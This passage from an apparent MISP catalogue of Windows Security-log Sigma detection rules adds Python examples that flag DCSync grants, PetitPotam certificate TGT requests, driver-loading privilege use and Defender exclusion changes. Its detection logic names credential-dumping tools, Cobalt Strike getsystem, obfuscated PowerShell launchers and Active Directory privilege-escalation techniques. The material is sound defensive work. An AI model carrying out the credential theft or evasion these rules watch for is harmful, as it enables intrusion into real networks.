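                          "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111-2222-3333-1105)"
                          "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)",
    },
    {
        "EventID": "5136", "SubjectUserName": "DC01$", "ObjectDN": "DC=corp,DC=local",
        "AttributeLDAPDisplayName": "nTSecurityDescriptor",
        "AttributeValue": "O:DAG:DAD:AI(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111-2222-3333-516)"
                          "(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-1111-2222-3333-498)",
    },
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for f in suspicious_dcsync_grants(ev):
            print(f"DCSync right {f['right']} granted to {f['trustee']} on {f['object']} by {f['by']}")
```

Event 5136 is only written when Directory Service Changes auditing is enabled and the domain head carries a SACL for write-DACL operations; without that, the rule has nothing to match. The baseline set is deliberately small: any additional principal that legitimately needs replication rights (for example a password-sync service account) should be added explicitly rather than by widening the RID list.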

Uncommon Outbound Kerberos Connection - Security

Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.

Internal MISP references

UUID eca91c7c-9214-47b9-b4c5-cb1d7e4f2350 which can be used as unique global reference for Uncommon Outbound Kerberos Connection - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, oscd.community
creation_date 2019/10/24
falsepositive ['Web Browsers and third party application might generate similar activity. An initial baseline is required.']
filename win_security_susp_outbound_kerberos_connection.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

Suspicious Remote Logon with Explicit Credentials

Detects suspicious processes logging on with explicit credentials

Internal MISP references

UUID 941e5c45-cda7-4864-8cea-bbb7458d194a which can be used as unique global reference for Suspicious Remote Logon with Explicit Credentials in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton
creation_date 2020/10/05
falsepositive ['Administrators that use the RunAS command or scheduled tasks']
filename win_security_susp_logon_explicit_credentials.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.t1078', 'attack.lateral_movement']
Related clusters

To see the related clusters, click here.

Important Windows Event Auditing Disabled

Detects scenarios where system auditing for important events such as "Process Creation" or "Logon" events is disabled.

Internal MISP references

UUID ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1 which can be used as unique global reference for Important Windows Event Auditing Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/20
falsepositive ['Unlikely']
filename win_security_disable_event_auditing_critical.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation CLIP+ Launcher - Security

Detects obfuscated use of Clip.exe to execute PowerShell

Internal MISP references

UUID 4edf51e1-cb83-4e1a-bc39-800e396068e3 which can be used as unique global reference for Invoke-Obfuscation CLIP+ Launcher - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_clip_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Reconnaissance Activity

Detects activity such as "net user administrator /domain" and "net group domain admins /domain"

Internal MISP references

UUID 968eef52-9cff-4454-8992-1e74b9cbad6c which can be used as unique global reference for Reconnaissance Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community
creation_date 2017/03/07
falsepositive ['Administrator activity']
filename win_security_susp_net_recon_activity.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1087.002', 'attack.t1069.002', 'attack.s0039']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use Clip - Security

Detects obfuscated PowerShell via use of Clip.exe in scripts

Internal MISP references

UUID 1a0a2ff1-611b-4dac-8216-8a7b47c618a6 which can be used as unique global reference for Invoke-Obfuscation Via Use Clip - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_via_use_clip_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Windows Pcap Drivers

Detects Windows Pcap driver installation based on a list of associated .sys files.

Internal MISP references

UUID 7b687634-ab20-11ea-bb37-0242ac130002 which can be used as unique global reference for Windows Pcap Drivers in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cian Heasley
creation_date 2020/06/10
falsepositive ['Unknown']
filename win_security_pcap_drivers.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.credential_access', 'attack.t1040']
Related clusters

To see the related clusters, click here.

Remote Task Creation via ATSVC Named Pipe

Detects remote task creation via at.exe or an API interacting with the ATSVC named pipe

Internal MISP references

UUID f6de6525-4509-495a-8a82-1f8b0ed73a00 which can be used as unique global reference for Remote Task Creation via ATSVC Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/04/03
falsepositive ['Unknown']
filename win_security_atsvc_task.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.persistence', 'car.2013-05-004', 'car.2015-04-001', 'attack.t1053.002']
Related clusters

To see the related clusters, click here.

Replay Attack Detected

Detects possible Kerberos Replay Attack on the domain controllers when "KRB_AP_ERR_REPEAT" Kerberos response is sent to the client

Internal MISP references

UUID 5a44727c-3b85-4713-8c44-4401d5499629 which can be used as unique global reference for Replay Attack Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/14
falsepositive ['Unknown']
filename win_security_replay_attack_detected.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1558']
Related clusters

To see the related clusters, click here.

Sysmon Channel Reference Deletion

Detects potential threat-actor tampering with the Sysmon manifest (deleting its channel reference), which can eventually disable Sysmon logging

Internal MISP references

UUID 18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc which can be used as unique global reference for Sysmon Channel Reference Deletion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/07/14
falsepositive ['Unknown']
filename win_security_sysmon_channel_reference_deletion.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Credential Dumping Tools Service Execution - Security

Detects well-known credential dumping tools execution via service execution events

Internal MISP references

UUID f0d1feba-4344-4ca9-8121-a6c97bd6df52 which can be used as unique global reference for Credential Dumping Tools Service Execution - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
creation_date 2017/03/05
falsepositive ['Legitimate Administrator using credential dumping tool for password recovery']
filename win_security_mal_creddumper.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.execution', 'attack.t1003.001', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.005', 'attack.t1003.006', 'attack.t1569.002', 'attack.s0005']
Related clusters

To see the related clusters, click here.

DPAPI Domain Master Key Backup Attempt

Detects anyone attempting a backup of the DPAPI master key. This event gets generated on the source host and not on the Domain Controller.

Internal MISP references

UUID 39a94fd1-8c9a-4ff6-bf22-c058762f8014 which can be used as unique global reference for DPAPI Domain Master Key Backup Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/08/10
falsepositive ['If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event.']
filename win_security_dpapi_domain_masterkey_backup_attempt.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.004']
Related clusters

To see the related clusters, click here.

SCM Database Handle Failure

Detects non-system users failing to obtain a handle to the SCM database.

Internal MISP references

UUID 13addce7-47b2-4ca0-a98f-1de964d1d669 which can be used as unique global reference for SCM Database Handle Failure in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/08/12
falsepositive ['Unknown']
filename win_security_scm_database_handle_failure.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1010']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security

Detects obfuscated PowerShell via the VAR++ launcher

Internal MISP references

UUID 4c54ba8f-73d2-4d40-8890-d9cf1dca3d30 which can be used as unique global reference for Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_via_var_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

New or Renamed User Account with '$' Character

Detects the creation or renaming of a user account whose name contains the "$" character (the suffix that normally marks computer accounts). Attackers can use this to hide a user or to trick detection systems that lack the parsing mechanisms to tell the two apart.

Internal MISP references

UUID cfeed607-6aa4-4bbd-9627-b637deb723c8 which can be used as unique global reference for New or Renamed User Account with '$' Character in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, oscd.community
creation_date 2019/10/25
falsepositive ['Unknown']
filename win_security_new_or_renamed_user_account_with_dollar_sign.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Windows Network Access Suspicious desktop.ini Action

Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.

Internal MISP references

UUID 35bc7e28-ee6b-492f-ab04-da58fcf6402e which can be used as unique global reference for Windows Network Access Suspicious desktop.ini Action in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Shelton (HAWK.IO)
creation_date 2021/12/06
falsepositive ['Read only access list authority']
filename win_security_net_share_obj_susp_desktop_ini.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1547.009']
Related clusters

To see the related clusters, click here.

Tap Driver Installation - Security

Detects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques.

Internal MISP references

UUID 9c8afa4d-0022-48f0-9456-3712466f9701 which can be used as unique global reference for Tap Driver Installation - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, Ian Davis, oscd.community
creation_date 2019/10/24
falsepositive ['Legitimate OpenVPN TAP installation']
filename win_security_tap_driver_installation.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048']
Related clusters

To see the related clusters, click here.

PetitPotam Suspicious Kerberos TGT Request

Detects suspicious Kerberos TGT requests. Once an attacker obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step is to leverage that certificate for malicious purposes. One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus. This request generates a 4768 event with some unusual fields depending on the environment. This analytic will require tuning; we recommend filtering Account_Name to the Domain Controller computer accounts.

Internal MISP references

UUID 6a53d871-682d-40b6-83e0-b7c1a6c4e3a5 which can be used as unique global reference for PetitPotam Suspicious Kerberos TGT Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mauricio Velazco, Michael Haag
creation_date 2021/09/02
falsepositive ['False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts.']
filename win_security_petitpotam_susp_tgt_request.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1187']
Related clusters

To see the related clusters, click here.
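The description above names the signal (a 4768 carrying certificate fields) and the tuning (restrict Account_Name to domain controller computer accounts). The following Python is an added example, not the Sigma rule's own detection: it evaluates constructed 4768 records, treats a non-empty CertThumbprint as a PKINIT (certificate-based) TGT request, and in the tuned mode alerts only when the requested account is a DC computer account and the request did not come from that DC's own address, which is exactly what a PetitPotam/ESC8 chain followed by Rubeus on the attacker's host produces. The 4768 field names (TargetUserName, IpAddress, CertIssuerName, CertSerialNumber, CertThumbprint) are real; the DC inventory and the sample records are assumptions.

```python
from typing import Dict, Optional, Set

# Assumed inventory: each domain controller's computer account and the address(es) it
# authenticates from. A certificate-based TGT for DC01$ from any other address is the pattern
# left by PetitPotam + AD CS abuse followed by Rubeus asktgt on the attacker's machine.
DC_ACCOUNTS: Dict[str, Set[str]] = {"DC01$": {"10.0.0.5"}, "DC02$": {"10.0.0.6"}}


def client_ip(raw: str) -> str:
    """4768 records IPv4 clients as IPv4-mapped IPv6 ('::ffff:10.0.0.5'); strip the prefix."""
    return raw[len("::ffff:"):] if raw.startswith("::ffff:") else raw


def cert_tgt_alert(event: Dict[str, str],
                   dc_accounts: Dict[str, Set[str]] = DC_ACCOUNTS,
                   dc_only: bool = True) -> Optional[Dict[str, str]]:
    """Flag a 4768 TGT request authenticated with a certificate (non-empty CertThumbprint).

    dc_only=True applies the tuning the rule recommends: only requests for domain controller
    computer accounts count, and only from an address that is not that DC's own.
    dc_only=False returns every certificate-based TGT request, which is noisy wherever smart
    cards or Windows Hello for Business are in use."""
    if str(event.get("EventID")) != "4768":
        return None
    thumbprint = event.get("CertThumbprint", "").strip()
    if not thumbprint:
        return None  # password or AES pre-authentication, not PKINIT
    account = event.get("TargetUserName", "")
    src = client_ip(event.get("IpAddress", ""))
    alert = {"account": account, "source_ip": src, "issuer": event.get("CertIssuerName", ""),
             "serial": event.get("CertSerialNumber", ""), "thumbprint": thumbprint}
    if not dc_only:
        return alert
    expected = dc_accounts.get(account)
    if expected is None:
        return None  # not a DC account; covered only by the broad mode
    return None if src in expected else alert


# Constructed sample records (thumbprints and serials are made up).
SAMPLE_EVENTS = [
    {"EventID": "4768", "TargetUserName": "DC01$", "TargetDomainName": "CORP.LOCAL", "ServiceName": "krbtgt",
     "IpAddress": "::ffff:10.0.0.5", "CertIssuerName": "corp-CA", "CertSerialNumber": "1a00000012",
     "CertThumbprint": "8f3c9b0d2e1a4c5b6d7e8f9a0b1c2d3e4f5a6b7c"},          # DC01 itself: benign
    {"EventID": "4768", "TargetUserName": "DC01$", "TargetDomainName": "CORP.LOCAL", "ServiceName": "krbtgt",
     "IpAddress": "::ffff:10.0.50.23", "CertIssuerName": "corp-CA", "CertSerialNumber": "1a00000012",
     "CertThumbprint": "8f3c9b0d2e1a4c5b6d7e8f9a0b1c2d3e4f5a6b7c"},          # same cert, foreign host
    {"EventID": "4768", "TargetUserName": "jdoe", "TargetDomainName": "CORP.LOCAL", "ServiceName": "krbtgt",
     "IpAddress": "::ffff:10.0.20.7", "CertIssuerName": "corp-CA", "CertSerialNumber": "1a000000a9",
     "CertThumbprint": "0a1b2c3d4e5f60718293a4b5c6d7e8f9a0b1c2d3"},          # smart-card user logon
    {"EventID": "4768", "TargetUserName": "DC02$", "TargetDomainName": "CORP.LOCAL", "ServiceName": "krbtgt",
     "IpAddress": "::ffff:10.0.0.6", "CertIssuerName": "", "CertSerialNumber": "", "CertThumbprint": ""},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        hit = cert_tgt_alert(ev)
        if hit:
            print(f"certificate TGT for {hit['account']} from {hit['source_ip']} (issuer {hit['issuer']})")
```

The DC-to-address map is the part that needs maintaining; if a DC is multi-homed or sits behind NAT for some clients, list every address it can appear with, otherwise the tuned mode will alert on the DC's own renewals.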

Potential Privileged System Service Operation - SeLoadDriverPrivilege

Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver. With it, the user can dynamically load and unload device drivers or other code into kernel mode. This user right does not apply to Plug and Play device drivers. If you exclude privileged users/admins and the processes that are allowed to do so, you may be left with bad programs trying to load malicious kernel drivers. This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) as well as the usage of Sysinternals and various other tools, so you have to work with an allowlist to find the bad ones.

Internal MISP references

UUID f63508a0-c809-4435-b3be-ed819394d612 which can be used as unique global reference for Potential Privileged System Service Operation - SeLoadDriverPrivilege in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author xknow (@xknow_infosec), xorxes (@xor_xes)
creation_date 2019/04/08
falsepositive ['Other legitimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers.']
filename win_security_user_driver_loaded.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.
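The description and false-positive note above amount to a procedure: take every privilege-use event that names SeLoadDriverPrivilege, subtract the baseline of processes and users allowed to load drivers, and investigate the rest. The following Python is an added example, not the Sigma rule itself: it runs that filter over constructed Security-log 4673 records. The field names (EventID, PrivilegeList, ProcessName, SubjectUserName, SubjectDomainName, ProcessId) are real 4673 fields; the allowlists and the sample records are assumptions, and the choice of 4673 as the carrier of SeLoadDriverPrivilege use is likewise stated here as an assumption rather than taken from the page.

```python
from typing import Dict, Iterable, List, Optional

# Assumed baseline; build yours from the 4673 events observed in your environment. Paths are
# compared case-insensitively and must match in full, so a renamed or relocated copy of an
# allowed binary (the usual trick against path-based allowlists) is still reported.
ALLOWED_PROCESSES = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\drvinst.exe",
    r"c:\program files\sysinternals\procexp64.exe",
}
ALLOWED_USERS = {"SYSTEM", "svc-driverinstall"}  # a dedicated driver-installation account, assumed


def normalise_path(path: str) -> str:
    return path.strip().lower()


def driver_privilege_alert(event: Dict[str, str],
                           allowed_processes: Iterable[str] = ALLOWED_PROCESSES,
                           allowed_users: Iterable[str] = ALLOWED_USERS) -> Optional[Dict[str, str]]:
    """Alert on a 4673 event exercising SeLoadDriverPrivilege outside the baseline, else None."""
    if str(event.get("EventID")) != "4673":
        return None
    privileges = event.get("PrivilegeList", "").split()  # multi-valued field, one privilege per line
    if "SeLoadDriverPrivilege" not in privileges:
        return None
    process = normalise_path(event.get("ProcessName", ""))
    user = event.get("SubjectUserName", "")
    if process in {normalise_path(p) for p in allowed_processes} or user in set(allowed_users):
        return None
    return {"user": user, "domain": event.get("SubjectDomainName", ""),
            "process": process, "pid": event.get("ProcessId", "")}


def scan(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run the check over a batch of events and keep only the alerts."""
    return [alert for alert in (driver_privilege_alert(e) for e in events) if alert is not None]


# Constructed sample records, not real logs.
SAMPLE_EVENTS = [
    {"EventID": "4673", "SubjectUserName": "SYSTEM", "SubjectDomainName": "NT AUTHORITY",
     "ProcessName": r"C:\Windows\System32\svchost.exe", "ProcessId": "0x3a8",
     "PrivilegeList": "SeLoadDriverPrivilege"},                                   # baseline
    {"EventID": "4673", "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "ProcessName": r"C:\Users\jdoe\Downloads\loader.exe", "ProcessId": "0x1f40",
     "PrivilegeList": "SeLoadDriverPrivilege"},                                   # alert
    {"EventID": "4673", "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "ProcessName": r"C:\Temp\procexp64.exe", "ProcessId": "0x2bc",
     "PrivilegeList": "SeLoadDriverPrivilege"},                                   # allowed name, wrong path: alert
    {"EventID": "4673", "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "ProcessName": r"C:\Windows\System32\cmd.exe", "ProcessId": "0x9c0",
     "PrivilegeList": "SeSecurityPrivilege\n\t\t\tSeBackupPrivilege"},           # other privileges: ignore
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit['domain']}\\{hit['user']} used SeLoadDriverPrivilege from {hit['process']} (pid {hit['pid']})")
```

Excluding by user is the coarser of the two filters: an attacker who has already obtained an allowed user's token inherits the exclusion, so keep ALLOWED_USERS to accounts whose only job is driver installation and rely on the process allowlist for everything else.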

Invoke-Obfuscation VAR+ Launcher - Security

Detects obfuscated use of environment variables to execute PowerShell

Internal MISP references

UUID dcf2db1f-f091-425b-a821-c05875b8925a which can be used as unique global reference for Invoke-Obfuscation VAR+ Launcher - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_var_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Windows Defender Exclusion Reigstry Key - Write Access Requested

Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.

Internal MISP references

UUID e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d which can be used as unique global reference for Windows Defender Exclusion Reigstry Key - Write Access Requested in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @BarryShooshooga, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/10/26
falsepositive ['Unknown']
filename win_security_windows_defender_exclusions_write_access.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Meterpreter or Cobalt Strike Getsystem Service Installation - Security

Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation

Internal MISP references

UUID ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34 which can be used as unique global reference for Meterpreter or Cobalt Strike Getsystem Service Installation - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems)
creation_date 2019/10/26
falsepositive ['Unlikely']
filename win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1134.001', 'attack.t1134.002']
Related clusters

To see the related clusters, click here.

Suspicious Kerberos RC4 Ticket Encryption

Detects service ticket requests using RC4 encryption type

Internal MISP references

UUID 496a0e47-0a33-4dca-b009-9e6ca3591f39 which can be used as unique global reference for Suspicious Kerberos RC4 Ticket Encryption in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/02/06
falsepositive ['Service accounts used on legacy systems (e.g. NetApp)', 'Windows Domains with DFL 2003 and legacy systems']
filename win_security_susp_rc4_kerberos.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

Windows Defender Exclusion List Modified

Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.

Internal MISP references

UUID 46a68649-f218-4f86-aea1-16a759d81820 which can be used as unique global reference for Windows Defender Exclusion List Modified in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @BarryShooshooga
creation_date 2019/10/26
falsepositive ['Intended exclusions by administrators']
filename win_security_windows_defender_exclusions_registry_modified.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.
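The three Defender exclusion entries on this page (Windows Defender Exclusion Deleted, Windows Defender Exclusion Reigstry Key - Write Access Requested, and Windows Defender Exclusion List Modified) all watch the same registry subtree from different angles: a value created or modified, a value deleted, and a write handle requested on the key. The following Python is an added example, not any of those rules' own logic: one function triages constructed Security-log 4657 (registry value change) and 4663 (object access) records against the Exclusions key, reports which exclusion list (Paths, Extensions, Processes) was touched and by which process, and ignores read-only handles, which the Defender service itself opens constantly. The event fields are real; the mapping of the %%-coded OperationType and AccessList strings and the sample records are assumptions.

```python
from typing import Dict, Optional

# Registry path fragment shared by the Defender exclusion lists (Paths, Extensions, Processes, ...).
EXCLUSIONS_MARKER = "\\microsoft\\windows defender\\exclusions"

# Event 4657 OperationType codes (assumed mapping of the Security log's message-table strings).
OPERATION_TYPES = {
    "%%1904": "exclusion created",
    "%%1905": "exclusion modified",
    "%%1906": "exclusion deleted",
}
# Event 4663 AccessList codes that amount to a write on a registry key (assumed mapping).
WRITE_ACCESS_CODES = {
    "%%4417": "set value",      # WriteData / AddFile
    "%%4418": "create subkey",  # AppendData / AddSubdirectory
}


def exclusion_list_name(object_name: str) -> Optional[str]:
    """'Paths', 'Extensions', ... for an object under the Exclusions key, '(root)' for the key itself, else None."""
    lowered = object_name.lower()
    idx = lowered.find(EXCLUSIONS_MARKER)
    if idx < 0:
        return None
    tail = object_name[idx + len(EXCLUSIONS_MARKER):]
    if tail and not tail.startswith("\\"):
        return None  # e.g. "...\ExclusionsBackup": a different key
    return tail.lstrip("\\").split("\\", 1)[0] or "(root)"


def triage_defender_exclusion_event(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Classify a 4657/4663 Security event touching the Defender exclusions keys; None if unrelated."""
    list_name = exclusion_list_name(event.get("ObjectName", ""))
    if list_name is None:
        return None
    base = {"list": list_name, "process": event.get("ProcessName", ""), "user": event.get("SubjectUserName", "")}
    event_id = str(event.get("EventID"))
    if event_id == "4657":
        action = OPERATION_TYPES.get(event.get("OperationType", ""))
        if action is None:
            return None
        return {**base, "action": action, "value": event.get("ObjectValueName", "")}
    if event_id == "4663":
        requested = set(event.get("AccessList", "").split())  # multi-valued, one code per line
        writes = sorted(WRITE_ACCESS_CODES[c] for c in requested & set(WRITE_ACCESS_CODES))
        if not writes:
            return None  # read-only handle: the Defender service reads these keys all the time
        return {**base, "action": "write access requested", "value": ", ".join(writes)}
    return None


# Constructed sample records, not real logs.
HIVE = "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions"
SAMPLE_EVENTS = [
    {"EventID": "4657", "SubjectUserName": "jdoe", "OperationType": "%%1904",
     "ProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ObjectName": HIVE + "\\Paths", "ObjectValueName": "C:\\Users\\Public\\stage"},     # new path exclusion
    {"EventID": "4663", "SubjectUserName": "jdoe", "ObjectType": "Key",
     "ProcessName": "C:\\Windows\\regedit.exe",
     "ObjectName": HIVE + "\\Processes", "AccessList": "%%4417\n\t\t\t\t%%4418"},       # write handle requested
    {"EventID": "4657", "SubjectUserName": "admin", "OperationType": "%%1906",
     "ProcessName": "C:\\Windows\\regedit.exe",
     "ObjectName": HIVE + "\\Extensions", "ObjectValueName": ".log"},                     # exclusion removed
    {"EventID": "4663", "SubjectUserName": "SYSTEM", "ObjectType": "Key",
     "ProcessName": "C:\\Program Files\\Windows Defender\\MsMpEng.exe",
     "ObjectName": HIVE + "\\Paths", "AccessList": "%%4432"},                             # read-only (assumed code)
    {"EventID": "4657", "SubjectUserName": "jdoe", "OperationType": "%%1905",
     "ProcessName": "C:\\Windows\\regedit.exe",
     "ObjectName": "\\REGISTRY\\MACHINE\\SOFTWARE\\Contoso\\App", "ObjectValueName": "Port"},  # unrelated key
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        hit = triage_defender_exclusion_event(ev)
        if hit:
            print(f"{hit['action']} in {hit['list']} ({hit['value']}) by {hit['user']} via {hit['process']}")
```

Neither event ID appears unless Object Access / Registry auditing is enabled and the Exclusions key carries a SACL with audit entries; without the SACL the rules on this page have nothing to match. Exclusions set through Group Policy land under the Policies hive rather than this key, so the marker above intentionally matches on the Windows Defender\Exclusions fragment rather than a full path.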

Suspicious Access to Sensitive File Extensions

Detects known sensitive file extensions accessed on a network share

Internal MISP references

UUID 91c945bc-2ad1-4799-a591-4d00198a1215 which can be used as unique global reference for Suspicious Access to Sensitive File Extensions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/04/03
falsepositive ['Help Desk operator doing backup or re-imaging end user machine or backup software', 'Users working with these data types or exchanging message files']
filename win_security_susp_raccess_sensitive_fext.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.collection', 'attack.t1039']
Related clusters

To see the related clusters, click here.

External Disk Drive Or USB Storage Device Was Recognized By The System

Detects external disk drives or plugged-in USB devices.

Internal MISP references

UUID f69a87ea-955e-4fb4-adb2-bb9fd6685632 which can be used as unique global reference for External Disk Drive Or USB Storage Device Was Recognized By The System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Keith Wright
creation_date 2019/11/20
falsepositive ['Likely']
filename win_security_external_device.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.t1091', 'attack.t1200', 'attack.lateral_movement', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Add or Remove Computer from DC

Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.

Internal MISP references

